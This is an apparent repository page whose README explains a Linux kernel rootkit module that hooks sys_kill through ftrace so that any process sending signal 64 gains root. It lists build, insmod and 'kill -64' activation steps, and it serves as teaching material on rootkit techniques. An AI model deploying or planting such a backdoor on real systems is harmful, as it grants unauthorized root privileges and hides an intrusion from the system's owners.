Fork: 1
21a5032 / linux_kernel_hacking
forked from miura250/linux_kernel_hacking
Download ZIP 97commits
Transfer to URL with SHA
linux_kernel_hacking / 3_RootkitTechniques / 3.3_set_root /
latest commit f8a14e0115
@Harvey Phillips Harvey Phillips authored on 12 Jan 2021
..
Makefile make a process root 4 years ago
README.md add link to blog post 4 years ago
ftrace_helper.h ftrace_helper fixes 4 years ago
rootkit.c remove __x64_ prefix from 3.3 4 years ago
README.md

Linux Kernel Hacking

3.3: Custom Signals To Give Root Privileges To A Process

Updated to use ftrace instead of directly modifying kernel memory

There is now a blog post explaining this module in more detail! Check it out here!

Similar to Section 3.2, we can abuse hooking sys_kill to trigger a function that gives root to any process that sends a 64 signal to a process (as before, signal 64 is normally unused).

According to credentials.rst, we can only modify the cred struct of our own process, and not that of any other process. This means that we can't give an already running process root privileges unless we send the 64 signal from that process! Quite a clever security feature!

All we have to do is send signal 64 to any process (as before, the signal isn't actually sent anywhere!) and we end up being root!

To use:

  • Build with make
  • Load with insmod rootkit.ko
  • Confirm that you currently are not root with whoami
  • Send signal 64 to any pid, e.g. kill -64 1
    • Note that the signal won't actually be sent to the pid you specify, so any number will do!
  • Check whoami again, and observe that you are now root!
  • Unload with rmmod rootkit